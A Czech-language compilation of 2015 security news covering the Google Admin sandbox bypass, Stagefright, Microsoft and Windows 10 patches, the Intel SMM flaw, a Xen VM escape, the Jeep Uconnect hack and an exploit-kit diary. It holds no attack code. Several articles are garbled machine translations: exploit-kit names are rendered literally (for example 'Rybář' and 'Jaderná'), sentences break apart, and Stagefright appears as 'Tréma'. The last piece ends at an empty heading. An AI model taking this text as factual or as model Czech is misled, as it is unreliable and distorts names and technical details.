Průběh útoku je tedy velmi podobný stejně jako u chyby, kterou bezpečnostní experti odhalili v polovině srpna. Ta se však týká jiné komponenty operačního systému Android. [celá zpráva]

Záplata zatím chybí
Teoreticky se dá riziko napadení snížit tím, že uživatelé budou stahovat aplikace pouze z ověřených zdrojů. Historicky se už ale několikrát stalo, že škodlivé aplikace se podařilo propašovat i do oficiálního internetového obchodu Googlu.

Oprava zatím ještě není k dispozici. Problém je také v tom, že celá řada výrobců již starší přístroje s Androidem čtvrté generace nepodporuje. Aktualizace by se tak nemusela k celé řadě uživatelů vůbec dostat.

Zpráva o nové kritické trhlině v operačním systému Android přichází krátce poté, co se ukázalo, že tato mobilní platforma může být snadno napadena pouhou MMS zprávou.

Chyba v aplikaci Google Admin umožňuje zneužití Google účtů

17.8.2015 Zranitelnosti
Po hrozbě Stagefrightu, která se objevila před pár dny, musí řešit díru v aplikaci Google Admin, správci administrátorského účtu Google Apps. Ta útočníkovi umožňuje obejít androidí sandboxy a dostat se tak k citlivým datům pracovních účtů Google.

Bezpečnostní pracovníci Androidu zažívají náročný měsíc. Po hrozbě Stagefrightu (více zde), která se objevila před pár dny, musí řešit díru v aplikaci Google Admin, správci administrátorského účtu Google Apps. Ta útočníkovi umožňuje obejít androidí sandboxy a dostat se tak k citlivým datům pracovních účtů Google. Chyba spočívá ve způsobu, jakým Google Admin zpracovává některé URL adresy.

Bezpečnostní model Androidu je založený na tom, že jednotlivé aplikace běží ve vlastních sandboxech, tudíž se vzájemně nemůžou dostat k citlivým datům prostřednictvím souborového systému. Komunikovat a vyměňovat data si sice mohou skrz API rozhraní, takové počínání ale vyžaduje udělení oboustranného souhlasu.

Výzkumníci z MWR InfoSecurity teď ale v aplikaci Google Admin objevili díru, díky které mohou škodlivé aplikace tyto sandboxy obejít a dostat se tak k citlivým datům.

Díra se podle nich nachází v procesu, kterým Google Admin zpracovává URL z jiných aplikací prostřednictvím komponenty WebView. Jestliže škodlivá aplikace zašle do Google Admin „žádost“ s URL odkazujícím na jí kontrolovaný HTML soubor, Google Admin nahraje jeho kód do WebView.

Útočník ale do tohoto kódu může vložit iframe, který s drobným zpožděním nahraje soubor znovu, a v rámci tohoto procesu může původní soubor nahradit jiným, se stejným jménem. Google Admin ho tak považuje za vlastní, útočník však díky němu může získat přístup k datům, s nimiž aplikace pracuje.

„Google Admin pro Androidy umožňuje administrátorům spravovat firemní Gmail účty přímo z jejich mobilních telefonů. Klíčový soubor v sandboxu Google Admin obsahuje autentizační token pro komunikaci se serverem, který ale může škodná aplikace díky objevené chybě zneužít a pokusit se přihlásit k serveru Google for Work,“ přibližuje Robert Miller, jeden z pracovníků týmu MWR, kteří na chybu narazili.

Podle nich se tak stalo už v půli března, kdy o ní rovnou informovali Google, ten ji ale dosud ani po opakované urgenci neopravil ani se k ní nevyjádřil. MWR proto o chybě informovalo v oficiální zprávě. Zda je zneužitelná i v rámci ostatních mobilních operačních systémů, autoři neuvádí.

Kumulované aktualizace pro Windows 10? Firmy můžou mít problém

14.8.2015 Zranitelnosti
Microsoft změní způsob distribuce bezpečnostních aktualizací mezi uživatele Windows 10. Všechny budou zabalené do jediného downloadu. To je oproti způsobu, jakým distribuoval – a dále distribuuje – aktualizace pro starší edice svého operačního systému, podstatný rozdíl.
Kumulované aktualizace pro Windows 10? Firmy můžou mít problém

„Microsoft s aktualizacemi pro Windows 10 přešel na jiný model. Namísto toho, aby patche vydával po jednom, vydává je v balících,“ říká Chris Goettl, produktový manažer společnosti Shavlik Technologies, která s Microsoftem na aktualizacích spolupracuje. „Je tak snadné operační systém záplatovat, ale zároveň to znamená, že uživatelé už jednotlivé aktualizace nemůžou před instalací zvlášť otestovat, což může být problematické, pokud některá z nich bude působit problémy.“

Pro Microsoft dosavadní způsob šíření aktualizací znamenal, že je nemusel jednotlivě kompletovat do balíčků pro každou verzi operačního systému, a uživatel měl zase výhodu v tom, že si mohl pohodlně vybrat, kterou aktualizaci chce nainstalovat, respektive odmítnout a na základě vlastního uvážení předcházet případným komplikacím.

To už ale pro Windows 10 neplatí. Alespoň zatím. Možnost aktualizaci odmítnout nebo přijmout jen některé její části už totiž uživateli nedávají. A je jedno, jste-li běžný uživatel nebo firemní zákazník.

Podle Goettla přitom právě firmám může nový způsob distribuce komplikovat život, jelikož ne každá aktualizace musí vyhovovat vnitropodnikovým předpisům a mechanismům.

„Firmy by v takovém případě musely změnit způsob, jakým funguje jejich IT oddělení,“ zamýšlí se nad možnými důsledky. Ačkoliv, jestli se dosavadní distribuce aktualizací v balíku stane skutečně i do budoucna normou, sám neví. Byť tomu dosavadní kroky nasvědčují, otázku musí zodpovědět Microsoft, který stále sbírá data uživatelů přihlášených do zkušebního programu Windows Insider.

Právě na základě jejich zkušeností totiž aktualizace připravuje. Goettl je ale mírně optimistický a současný stav se podle něho odvíjí od toho, že je pořád jen krátce poté, co byl nový operační systém puštěn do prodeje. „Nejspíš se jen v začátku snaží docílit toho, aby se všichni uživatelé dostali na stejnou úroveň a v budoucnu už aktualizace takto hromadné nebudou.“

Zero Day v Android Google App správce může obejít Sandbox

14.8.2015 Zranitelnosti

Android bezpečnostní tým společnosti Google má rušný měsíc. Nejprve zranitelnosti Tréma vynořily minulý měsíc těsně před černém klobouku a nyní vědci z laboratoří MWR vydali informace o unpatched zranitelnost, která umožňuje útočníkovi obejít Android pískoviště. Tato chyba zabezpečení spočívá ve způsobu, jakým aplikace Google správce na Android telefony zpracovává některé adresy URL. Pokud jiná aplikace v telefonu odesílá App admin specifický druh adresy URL útočník může obejít stejný původ politiky a získat data od správce karantény. "Problém byl nalezen, když aplikace Google správce obdržel adresu URL prostřednictvím IPC volání z jiných aplikací na stejném zařízení. Aplikace Správce by načíst tuto adresu URL v WebView v rámci své vlastní činnosti. Pokud útočník použil file: // URL souboru, který se kontrolované, pak je možné použít symbolické odkazy, aby se vyhnula stejný původ politiku a načíst data ven z pískoviště Google správce, dále jen "poradní říká z MWR Labs. Útočník může zneužít tuto chybu zabezpečení tím, že se nebezpečný app na telefonu oběti. MWR Labs oznámeny Google zranitelnost v březnu a Google vzala na vědomí zprávu hned, a později řekl, že bude mít záplatu připravený do června. Ale oprava byla nikdy tlačil ven a minulý týden MWR Labs informovala Google, že to plánoval vydat jeho poradenství, která byla zveřejněna ve čtvrtek. Google neodpověděl na žádost o komentář k tomuto příběhu. Tato chyba ovlivňuje aktuální verzi aplikace, a může mít vliv na předchozí verze stejně. "Aplikace Google pro správce (com.google.android.apps.enterprise.cpanel), má exportovaný aktivitu, která přijímá navíc řetězec s názvem setup_url. To může být spuštěna libovolné aplikace na zařízení vytváří nový záměr s datovým-URI nastaveným na http: // localhost / foo a setup_url řetězec nastaven na URL souboru, že mohou zapisovat do, jako například file: // dat /data/com.themalicious.app/worldreadablefile.html, "poradní MWR říká,. "The ResetPinActivity pak načíst toto v WebView pod privilegií aplikace Google Admin." MWR říká, že dokud patch je nasazen od společnosti Google, by měli uživatelé s aplikaci Google Správce neinstalovali žádné nedůvěryhodné aplikace třetích stran, což je dobrá rada pro jakékoliv mobilní telefon uživatele.

Microsoft Security Aktualizace 08. 2015
12.8.2015 Zranitelnosti

Microsoft vydává nová dávka čtrnácti aktualizací zabezpečení záplatování přes padesát zranitelnosti dnes, s jedním z nich je známo, že bude zneužit v cílených útoků. Velký počet zranitelností byly hlášeny výzkumníky z Google a jejich projektu Zero a iniciativu HP Zero Day. Mezitím, reflexní diskuse o hodnotě těchto útočných týmů je stanoven na offsec e-mailové konference .

V současné době využívána in-the-volné přírodě, MS15-085 "Chyba zabezpečení ve Správci hoře umožňuje zvýšení úrovně oprávnění", umožňuje útočníkovi vypsat spustitelný soubor na disk a spustit jej z vložení USB disku. Využití je v použití jako součást omezených cílených útoků. Zdá se, Aktualizace instalace a údržba, aby se velkou zakázku tady, protože Microsoft zahrnuje jedinečné doporučení s ním: "Pokud instalujete jazykovou sadu po instalaci této aktualizace, je třeba přeinstalovat tuto aktualizaci." Nejen, že je "Mountmgr.sys" jsou uvedeny několik set krát v tomto souvisejícím znalostní báze , ale více než sto ostatní soubory jsou dotkl s touto větší aktualizace. A nejen je Microsoft lodní kód zblízka zranitelnosti, oni jsou také lodní novou událost pro protokolu událostí, určit související využít pokusy, "Jako součást aktualizace, jsme také lodní protokolu událostí na pomoc obráncům odhalit pokusy použít tuto chybu zabezpečení svých systémů ". ID události 100: MountMgr "CVE-2015-1769" budou zaznamenány systémem Windows pro referenci.

Nový okraj webový prohlížeč udržuje tři "Korupce paměti" slabá místa. Typicky, když tyto vzniknou v internetových prohlížečích Microsoft, nedostatky byly problémy use-po-bez. Tyto problémy poškození paměti překvapivě umožnit vzdálené spuštění kódu v systému Windows 10: CVE-2015-2441 CVE-2015-2442 CVE-2015-2446 a jeden problém ASLR bypass. Zatímco kód základna je menší, rychlejší, a novější než IE, tyto problémy nadále se vyskytnout v jejich nejnovější kódu.

Více o srpnu 2015 bulletinů Microsoft lze nalézt zde , prosím, aktualizujte svůj systém co nejdříve.

Windows 10 už dostal první záplatu zabezpečení

12.8.2015 Zranitelnosti
Windows 10 už dostal první záplatu zabezpečeníDnes, Jan Pánek, aktualitaV rámci tradičního úterý, kdy operační systémy od Microsoftu dostávají aktualizace, se první dostaly i na Windows 10. Jednalo se i o bezpečnost, některé z aktualizací byly dokonce označeny jako vážné. Jsou to teprve dva týdny od vydání Windows 10 a Microsoft už vydal první aktualizace, které zlepší zabezpečení. Pět z nich je určených přímo pro Windows, další jsou určeny pro i pro Edge nebo MS Office.

Microsoft vydal celkem 14 oprav při příležitosti 2. úterý v měsíci. Wolfgang Kandek, šéf IT firmy Qualys, poznamenal, že Windows 10 zažívají velmi dobrý start, co se bezpečnosti týče. Windows 8 se podle něj první dva měsíce potýkaly s vážnými bezpečnostními problémy.

Záplata na MS Office, MS15-081, je nezvyklá. Řeší totiž opravdu velkou chybu, která útočníkovi umožňuje přebrat kontrolu nad zařízením. A to díky otevření zavirovaného dokumentu Word.

Aktualizace MS15-085 znemožňuje využít zranitelnosti, která útočníkům umožňovala získat přístup do systému díky škodlivému kódu na USB flash disku. Ze snahy Microsoftu lze vyčíst, že pro uživatele bude bezpečné, když na nové Windows 10 přejdou i dříve.

IBM objevilo další díru v Androidu, týká se víc jak poloviny uživatelů

11.8.2015 Zranitelnosti
Bezpečnostní výzkumníci společnosti IBM objevili způsob, jakým lze díky bezpečnostní chybě v Androidu nabourat až pětapadesát procent chytrých telefonů běžících právě na oblíbeném systému.

„Řečeno v kostce, pokročilý hacker může využít této mezery, nainstalovat do telefonu škodlivou aplikaci a zařízení zcela ovládnout,“ píše ve své zprávě bezpečnostní tým IBM s označením X-Force Application Security Research Team.

Nově objevená chyba se týká Androidů verzí 4.3 – 5.1, tedy kromě Jelly Bean a Lollipop taky nejrozšířenějších KitKatů, které běží na více než třetině všech zařízení s Androidem. Mezera je obsažena v certifikátu OpenSSL X509 a může být zneužita v rámci komunikace mezi aplikacemi a webovými službami, do které zdatný hacker snadno vloží škodlivý kód.

Prostřednictvím shell příkazů pak může ukrást data z kterékoliv nainstalované aplikace a na některých zařízeních dokonce modifikovat základní program operačního systému.

V praxi útok vypadá tak, že útočník do ovládnutého mobilního zařízení nainstaluje falešnou aplikaci (IBM simulovaný útok prezentovalo na Facebooku), která se tváří jako pravá, tudíž uživatel má minimální šanci poznat, že se stal obětí útoku, zatímco hacker bez potíží krade jeho data.

Škodlivý kód, kterým lze telefony nabourat, výzkumníci nezveřejnili a zároveň tlumí případné obavy. Podle nich není důvod k panice. Nejen proto, že k dispozici už je patch, ale také proto, že případů, kdy by byl kód využit, se zatím neobjevilo mnoho. Na druhou stranu, případný útok je prý tak důmyslný, že díky němu lze přelstít i ty nejsvědomitější uživatele dbající na bezpečnost svých zařízení.

Starší procesory Intel jsou zranitelné. Umožňují trvale infikovat PC

10.8.2015 Zranitelnosti

Na bezpečnostní konferenci Black Hat 2015 výzkumníci a hackeři prezentují své objevy týkající se nových možností napadení různorodých systémů. A pozornost tu nevzbudil jen případ napadeného automobilu. Starší procesory od Intelu totiž doběhla minulost, kdy byl odhalen vážný nedostatek v jejich zabezpečení, datovaný ještě do roku 1997. Na informaci upozornil web PC World.

Nově odhalenou zranitelnost v x86 architektuře procesorů zveřejnil bezpečnostní výzkumník Christopher Domas. Díra v zabezpečení umožňuje manipulaci s kritickým bezpečnostním prvkem SMM (System Management Mode). Jelikož zranitelnost je na úrovni firmwaru samotného procesoru, problém umožňuje vytvoření účinného rootkitu, který nedokáže detekovat žádné standardní antivirové řešení.

Co je to Rootkit
Sada speciálních aplikací, které před uživatelem aktivně skrývají svou existenci. Většinou jsou škodlivého charakteru a nejsou odhalitelné běžnými ochrannými prvky, jako například antivirem.

Škodlivý kód může po využití zranitelnosti například vymazat UEFI v zařízení. Co je však důležitější, na jeho odstranění nepostačuje ani vymazání pevného disku a reinstalace operačního systému. Malware nacházející se ve firmwaru totiž umožňuje zařízení znovu infikovat.

Nedostatek se nachází v procesorech Intel vyráběných od roku 1997. Bezpečnostní díra byla záplatování s příchodem generace procesorů Sandy Bridge, začátkem roku 2011. Mobilní čipy Intel Atom jsou odolné od roku 2013. V současnosti údajně probíhá testování i v případě konkurenčního AMD. Ačkoliv zatím neznáme detaily, Domas naznačil, že šance na výskyt obdobné zranitelnosti je v i v tomto případě vysoká.

Vzhledem k tomu, že se zranitelnost týká velkého počtu produktů, které jsou navíc staršího data, můžeme očekávat, že miliony starších zařízení zůstanou bez opravy. To i přesto, že Intel o chybě ví a pro některé modely čipů již vydal aktualizace firmwaru. Na kolik jich však budou aplikovat majitelé starší techniky, zůstává sporné.

Ale panika není na místě. Ani nová díra totiž není dokonalá. Aby mohl útočník aplikovat rootkit, musí nejprve disponovat potřebnými systémovými oprávněními. Reálný útok tak sice zůstává možný, ale pouze v kombinaci s využitím další, samostatné zranitelnosti.

Díra ve Firefoxu umožnila útočníkům získat citlivá data uživatelů

10.8.2015 Zranitelnosti

V internetovém prohlížeči Firefox byla objevena a již také prokazatelně zneužita chyba, která umožňuje javascriptovému kódu číst lokální soubory. Typicky se toho dá zneužít k odcizení souborů obsahující přístupové klíče atp. Chybu Mozilla záhy po objevení opravila, ale uživatelům pro jistotu doporučuje, aby po aktualizaci prohlížeče změnili svá hesla ukládaná lokálně.

Chyba se konkrétně nacházela ve vestavěném prohlížeči PDF dokumentů a byla zneužitelná na všech desktopových platformách. Netýká se mobilní verze, kde není funkce pro čtení PDF k dispozici. Bohužel nelze nijak zjistit, zda byla v počítači chyba zneužita, nezanechává totiž žádné stopy.

První větší várka oprav pro Windows 10 dorazila do Windows Update

6.8.2015 Zranitelnosti

Po necelém týdnu na trhu je tu první velká aktualizace pro Windows 10.
Aktualizace pro Windows 10 z 5. srpna 2015 (KB3081424) obsahuje i bezpečnostní opravu z 29. července (KB3074683) a připravte se na delší stahování (přes 300 MB) a poměrně značné množství opravovaných programů a souborů, včetně nutnosti restartovat počítač. A zapomeňte na to, že by Microsoft v popisu aktualizace nějak blíže určil, co vlastně opravuje.

Zmíněný bezpečnostní balíček nicméně opravuje MS15–074, MS15–078, Microsoft Security Advisory 2755801 a Adobe Security Bulletin APSB15–18. Poslední jmenované opět opravuje vážné chyby ve Flashi (kritická chyba umožňující převzít kontrolu nad počítačem), tedy v něčem, co byste prioritně měli z počítače odstranit. MS15–078 je také kritická oprava, pro změnu ovladače pro fonty od Microsoftu, která také může vést k ovládnutí počítače. A MS15–074 se týká instalační služby Windows, zneužitelné podobným způsobem.

Nezapomeňte, pokud máte Windows 10 Home nebo jste si nenastavili Windows 10 Pro, aby nedošlo k automatické instalaci restartu, tak se možná budete divit. Viz Automatické aktualizace Windows 10 — ztráta vlády nad počítačem? a Jak je to s Windows 10 a zásadním útokem na naše soukromí

Stejně jako update na Windows 10 doprovázejí u některých uživatelů problémy, i instalace této první velké kumulativní aktualizace se některým uživatelům nedaří. Lze tak soudit podle komentářů na Internetu, byť žádné řešení či bližší určení z nich nezjistíte. Můžete tedy zkusit štěstí, nebo si před aktualizací pro jistotu udělat kompletní zálohu a vlastní bod obnovy.

Xen Záplaty VM Útěk Chyba

1.8.2015 Zranitelnosti

Xen Projekt oprava vážnou chybu zabezpečení, která by mohla umožnit útočníkovi v hodnocení virtuálním stroji uniknout a získat možnost spustit libovolný kód na hostitelském počítači. Zranitelnost je v QEMU open source Machine Emulator, který je dodáván jako součást hypervisoru Xen. Problém souvisí se způsobem, že jedna z komponent QEMU je zpracování určitých příkazy. Související příspěvky Neobvyklé Re-Do americké Wassenaarského Pravidla zatleskali 31 července 2015, 12:56 Cisco Opravy DoS zabezpečení v ASR 1000 Směrovače 30 července 2015, 14:55 OwnStar zařízení může vzdáleně Vyhledejte Uvolnit, a Start GM auta 30 července 2015, 09:38 "Přetečení haldy chyba byla nalezena ve způsobu QEMU je IDE subsystém ovládal I přístup / O vyrovnávací paměti při zpracování určitých příkazy ATAPI. výsadní uživatele guest v host s CD-ROM povolenou mohli potenciálně využít tuto chybu spustit libovolný kód na hostitele s výsady QEMU procesu hostitele odpovídá hosta, " poradní Xen říká. Tato zranitelnost, která byla objevena Kevin Wolfa v Red Hat, se týká pouze Xen systémů na systémy x86; ARM systémy na bázi nejsou ohroženy. Postižené verze obsahují Xen 4.5.x, 4.4.x, 4.3.x, 4.2.x, a v qemu-XEN-tradiční odvětví a 4.5.x, 4.4.x, 4.3.x a v qemu-upstream větev. "HVM host, který má přístup k emulovaný IDE CDROM zařízení (např zařízení s "devtype = cdrom", nebo "cdrom" pohodlí alias, v konfiguraci VBD) může zneužít tuto chybu zabezpečení převezme proces QEMU zvednutím výsada, že z QEMU procesu, "říká poradní. V dubnu, výzkumník z CrowdStrike odhalila zranitelnost ve virtuálním řadič disketových jednotek QEMU to , že dovolil útočník uniknout VM a napadnout hostitele. Chyba potřebný útočník být ověřený uživatel na virtuálním stroji.

Stagefright: objevena díra v Androidu zneužitelná posláním jedné MMS

28.7.2015 Zranitelnosti

Většina bezpečnostních chyb má společnou jednu věc: aby je útočníci mohli zneužít, potřebují k tomu aktivní „spolupráci“ své oběti – ta musí například stáhnout či otevřít infikovaný soubor, nebo aktivně vykonat jinou akci, která vpustí hackera dovnitř.

Chyba využívající multimediální knihovnu Stagefright v Androidu je ale nebezpečná hlavně kvůli tomu, že se dá zneužít i bez aktivní účasti uživatele, třeba i v době, kdy telefon sám aktivně nepoužívá. Útočníkům k proniknutí do zařízení stačí jen znát jeho telefonní číslo.

Na to mohou poslat MMS obsahující speciálně upravený mediální soubor a je hotovo. „Plně připravený úspěšný útok dokonce může zprávu smazat dříve, než ji uživatel přečte. Zůstane jen upozornění na její doručení,“ upozorňuje Joshua J. Drake z Zimperium Mobile Security, který chybu objevil.

Úspěšný útok může dát hackerovi vládu nad řadou funkcí a aplikací v zařízení – například na mikrofonem či kamerou. Může ale získat i úplný přístup k telefonu. Další podrobnosti o chybě chce Zimperium zveřejnit začátkem srpna na amerických konferencích Black Hat USA a DEF CON 23.

Záplaty jen pro někoho

Podle bezpečnostní firmy jsou chybou ohroženy všechny přístroje s Androidem 2.2 a vyšším. Nejvyšší riziko přitom nesou mobily s verzí starší než Android 4.2 Jelly Bean (jde asi o 11 % zařízení).

Firma na problém upozornila Google a zároveň mu navrhla vlastní záplaty, které jej mají řešit. Google podle ní zareagoval bleskově a do 48 hodin nasadil ve svých vnitřních systémech. Jenže to zdaleka nestačí.

Google totiž neumí záplatovat operační systémy ve všech zařízeních s Androidem. Může leda tak vyzvat výrobce a operátory, aby patche poslali do telefonů svých zákazníků. To ale může trvat a na starší zařízení se oprava ani nemusí dostat.

Jedinou obranou uživatelů tak může být podle některých zdrojů zákaz automatického stahování příloh z MMS, nebo zákaz automatického příjmu MMS jako takových (například v Hangouts).

Zero Day využije: nyní k dispozici pro auta
25.7.2015 Zranitelnosti

Den před Včera byl důležitý den pro informační bezpečnosti průmyslu. Vyšetřovatelé oznámili využívání vůbec prvního 0-denní zranitelnost pro automobily. Bezdrátový Útok byl demonstrován na Jeep Cherokee.

Charlie Miller a Chris Valášek našel zranitelnost v palubním počítačem vozu. Lidé mluvili na dlouhou dobu o útocích na těchto systémů v případě, že útočníci mají přístup k diagnostickým konektorem. Nicméně vzdálený útok na kritických systémů autě zůstala čistě teoretický scénář, o kterém odborníci varují na dlouhou dobu (včetně odborníků ze společnosti Kaspersky Lab). Mnozí doufali, že výrobci automobilů by rozpoznal nebezpečí takových zranitelností zneužívána a přijímat preventivní opatření. No, přecenil jsme je.

Vyšetřovatelé získali přístup prostřednictvím palubního zábavního systému nejen nekritických nastavení, ale také ovládací prvky vozu, jako jsou brzdy a akcelerátoru. Vyšetřovatelé plánujete publikovat technické podrobnosti hack v srpnu, ale celkovém schématu věcí je již známo.

Car Hack

Chcete-li začít s, klimatizační, rozhlasové a stěrače zbláznil a řidič nemohl dělat nic o tom. A pak auto sám. Urychlovač a brzdy džípu reagovala pouze na odlehlých vyšetřovateli, a nikoli na majiteli vozu za volantem.

Je zde třeba poznamenat, že auto se nebyla změněna . Všechny výše uvedené se provádí za použití zabezpečení v palubním Uconnect systému, který se stará o kontakt s vnějším světem přes infrastruktury provozovatele Sprint buněk v automobilech na FCA auto-skupiny (Chrysler, Dodge, Fiat, džípu a RAM). Je to dost znát externí IP adresu oběti (o něco později více o těchto jednotkách) přepsat kód v hlavní jednotky vozu.

Firma již vydala opravu pro Uconnect, který může být nainstalován buď na oficiálních dealerů, nebo, v případě technicky zlobil, nezávisle pomocí USB portu. V okamžiku, kdy vyšetřovatelé mohou vidět VIN, GPS souřadnic určitého vozidla a IP adresu, připojením k síti Sprint a za použití 0-day exploit našli. Mimochodem, najít konkrétní vozidlo mezi 471.000 vozidel s Uconnect na palubě je podle vyšetřovatelů, značně obtížné.

Koncepční obrana

Toto není první událost ukazuje na nedostatečné bezpečnostní mechanismy zabudované do moderních automobilů jako standard. Před tímto jsme viděli místní zabavení nad řízením přes diagnostické portu OBD-II a nedovoleného aktualizaci softwaru přes falešnou buňka základnové stanice.

Oba výrobci operační systém a výrobci automobilů jsou nyní provádění důležité a potřebné , ale nedostatečné, kybernetické bezpečnostní opatření. Situaci ještě zhoršuje skutečnost, že architektura palubních elektronických sítí vozidel byl vyvinut v 80. letech, kdy se myšlenka, že auto by být připojen k Internetu bylo něco z sci-fi. A v důsledku toho, ačkoli elektronické součástky jsou spolehlivé a funkčně bezpečný totéž nelze říci o jejich počítačové bezpečnosti. Tady ve společnosti Kaspersky Lab, stejně jako v případě s běžnými počítačovými sítěmi, jsme přesvědčeni, že naprostá bezpečnost multi-level může být dosaženo pouze kombinací pravého architektury, vyvinula s přihlédnutím ke všem rizikům, včetně kybernetických rizik, správné nastavení z předem stanovených zařízení a použití specializovaných řešení.

Architektura

Přístup Kaspersky Lab je založen na dvou základních architektonických principů: izolaci a řízených komunikací .

Izolace zaručuje, že dva samostatné subjekty, nelze v žádném případě vzájemně ovlivňují. Například, zábavní aplikace nemohou mít vliv na technické sítě. Ne na palubě letadla, a ne v autě.

Řízení komunikace zaručuje, že dva nezávislé subjekty, které by měly společně pracovat pro systém fungovat tak učiní přísně v souladu s politikou bezpečnosti a zabezpečení. Například systém pro získávání telemetrii a jeho odeslání do servisního střediska mohou pouze číst data o stavu vozu, ale nepřenáší řídicí signály. Tento druh kontroly by byla velkým přínosem pro naše majitele Jeep.

Využití kryptografie a ověřování pro přenos a přijímání informací uvnitř a zvenčí je rovněž nezbytná součástí chráněného systému. Ale soudě podle výsledků vyšetřovatelů, Jeep použit buď slabé zranitelné algoritmů nebo kryptografie byl realizován s chybami, nebo nejsou implementovány vůbec.

Popsaný přístup - izolace a kontrola komunikace - se přirozeně na operační systém mikro-kernel s řízenou interakci mezi procesy. Každý logický doména má svůj vlastní adresový prostor a všechny kontakt mezi doménami se vždy provádí prostřednictvím bezpečnostní monitor.

Produkty

Z palubní elektroniky ovládajících kriticky důležité funkce vozidla a teoreticky otevřený k útoku klíčové prvky jsou hlavové jednotky (HU) a elektronické řídicí jednotky (ECU), které tvoří celou síť regulátorů. K dispozici jsou řídicí bloky pro motor, převodovka, odpružení atd.

Jednotky hlavy pracují na reálných time operační systémy (RTOS), jako QNX, VxWorks a další. Společnost Kaspersky Lab má v úmyslu nabídnout své vlastní chráněné operační systém pro hlavy jednotky po získání potřebných certifikátů.

Oba architektonických principů výše (izolace a kontrola komunikacích) zmíněných jsou základními principy KasperskyOS - bezpečná mikro-kernel operační systém s řízenou interakci mezi procesy.

Operační systém byl vytvořen od nuly a bezpečnost byl jeho hlavní prioritou od samého počátku. To je hlavní rozdíl mezi naším výrobkem a operačních systémů nyní instalovány do vozů. Zavolali jsme klíčovou součástí našeho bezpečného operačního systému Bezpečnostní systém Kaspersky (KSS)

Během provozu tento systém má povinnost provádět výpočet verdikt o bezpečnosti daném případě děje v systému. Na základě tohoto rozsudku jádro operačního systému přijme rozhodnutí povolit nebo zablokovat události nebo pro komunikaci mezi procesy. S pomocí KSS je možno ovládat žádnou činnost, - přístup do přístavů, souborům, síťových zdrojů prostřednictvím konkrétních aplikací atd v okamžiku, kdy KSS pracuje na pikeos a Linux.

Software na elektronických řídicích bloků je pouze malé bloky kódu, a pro tyto společnosti Kaspersky Lab má v úmyslu spolupracovat s firmami mikroelektroniky společně zaručit bezpečnost tohoto embedded software.

V místě závěru

My opravdu nechci, aby sami sebe popřít pohodlí, které elektronizace automobilů přineslo. Pokud však výrobci automobilů nezačnou brát problém kybernetické bezpečnosti svých vozů připojených k Internetu vážně a nezačnou náročný, že výrobci automobilových součástí, to samé pak lidé, kteří se obávají o bezpečnost budou muset přejít na klasické automobily , Ano, stará auta nemají počítače. Ano, nemají počítačem řízené vstřikování paliva, navigační systémy, ovládání klimatizace a další moderní pomůcky. Ale na druhou stranu oni jen poslouchali osobu za volantem.

Po Flash, co se bude využívat sady zaměří na další?

16.7.2015 Zranitelnosti
Úvod

Adobe přijal nějakou špatnou publicitu, pokud jde o zero-day Flash Player využije kvůli nedávnému Hacking Team kompromisu [ 1 , 2 ]. To rozhodně není poprvé, Adobe má takové problémy [ 3 ]. S HTML5 video jako alternativa k Flash player, dalo by se divit, jak dlouho Flash player bude relevantní. Google oznámil další stabilní verzi prohlížeče Chrome bude blokovat auto-přehrávání Flash prvky [ 4 ], a Firefox začal blacklisting pluginy Flash player na počátku tohoto týdne [ 5 ]. Díky lidem, jako je Facebook je hlavní bezpečnostní důstojník volá Adobe oznamuje koncového-of-života termín pro Flash [ 6 ], byl jsem přemýšlel o budoucnosti Flash player.

Přesněji řečeno, byl jsem přemýšlel, co exploit kit (EK), autoři se obrátit na, jakmile Flash player již není relevantní.

V posledních měsících, většina EK traffic jsem generovaný použit blesk exploit nakazit zranitelné počítače Windows. Situace se dnes Flash player je podobně jako situace s Java, který si pamatuji zpět v roce 2013 a většina z roku 2014. Nicméně, na podzim roku 2014, většina EKS poklesla Java těží ze svého arzenálu a začal se spoléhat na Flash player jako vozidlo za jejich nejvíce up-to-date využije.

Nedávná historie Java využívá v EK provozu

Java využije byli prevelant, když jsem poprvé začal blogů o EK provozu v roce 2013 [ 7 ]. Tehdy, Blackhole EK byl ještě hráčem, a já běžně viděl Java exploity v EK provozu.

Hrozeb změnila trochu, když EK údajné tvůrce "břichem" byl zatčen. Organizace, které monitorují provoz EK zaznamenali prudké snížení Blackhole EK provozu v roce 2014 ve srovnání s předchozím rokem [ 8 ]. Během té stejné době, začal jsem si všímat víc Flash exploity v EK provozu. Do září 2014 většina ze zbývajících EKS přestali používat Java.

Moje poslední dokumentované termíny pro Javu využívá v exploit kit provoz jsou nižší (čti: zneužít jméno kit - data Java exploit naposledy viděn).

Rybář EK - 2014-09-16 [ 9 ]
Flashpack EK - 2014-08-30 [ 10 ]
Jaderná EK - 09.8.2014 [ 11 ]
Velikost EK - 2014-08-15 [ 12 ]
Sladké Orange EK - 2014-09-25 [ 13 ]
Rig EK - 09.6.2014 [ 14 ]
Za zmínku stojí, Flashpack EK a sladké Orange EK zmizely, a oni nejsou v současné době problém. Neutrino EK byl spící od dubna do října roku 2014, a když to přišlo zpátky, neviděl jsem ji používat jakékoliv zneužití Java.

Fiesta EK stále vysílá několik různých typů využije v závislosti na zranitelné klienta, a to ještě má Java využívá ve svém arzenálu. Ostatní menší-viděný EKS jako Kaixin i nadále používat Java exploity. Nicméně, většina z EKS vzdal na Java někdy v loňském roce.

Co jsme v poslední době viděli s Flash exploity

Nejvíce využívají soupravy používat nejnovější dostupné Flash exploity. Rybář, Neutrino, Jaderná, velikosti, a Rig EK jsou všechny využitím nejnovější Hacking Team Flash player exploit na základě CVE-2015-5122 [ 15 ]. Pokud máte Flash player v počítači se systémem Windows, měli byste být spuštěn nejnovější aktualizace Flash (verze 18.0.0.209, jak píšu to).

Dříve jsem generované rybář EK provoz infikovat hostitele Windows běžící Flash player 18.0.0.203 na IE 11. Rybář poslal Flash exploit na základě CVE-2015 - 5122, a EK poslal CryptoWall 3.0 jako malware užitečného zatížení.

Nahoře: Obraz infekce rybář EK a po infekci CryptoWall 3,0 provoz v Wireshark. Klikněte na obrázek pro zobrazení v plné velikosti.

Nahoře: Rybář EK zaslání Flash využívat, na základě CVE-2015-5122, cílení Flash 18.0.0.203.

Adresa Bitcoin infikované hostitele pro výplatu výkupného byl 1LY58fiaAYFKgev67TN1UJtRveJh81D2dU . Adresa je stejný vidět na 07.1.2015 a také dokumentováno v mém předchozím deníku na CryptoWall 3.0 [ 16 ].

Nahoře: dešifrovat pokyny z infikovaného počítače.

Závěrečná slova

